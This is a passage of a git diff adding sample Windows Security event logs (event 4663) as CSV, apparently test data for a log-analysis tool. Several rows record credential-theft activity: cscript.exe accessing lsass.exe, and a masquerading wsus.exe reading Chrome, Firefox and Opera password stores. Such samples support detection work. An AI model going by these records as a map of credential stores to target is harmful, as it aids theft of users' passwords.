01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" diff --git a/source/samples/Sample_Object_Access_Events.csv b/source/samples/Sample_Object_Access_Events.csv new file mode 100644 index 0000000..01dbd53 --- /dev/null +++ b/source/samples/Sample_Object_Access_Events.csv @@ -0,0 +1,14715 @@ +Date and Time,timestamp,Event ID,Account Name,Object Name,Object Type,Process Name,Computer Name,Channel,Original Event Log +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 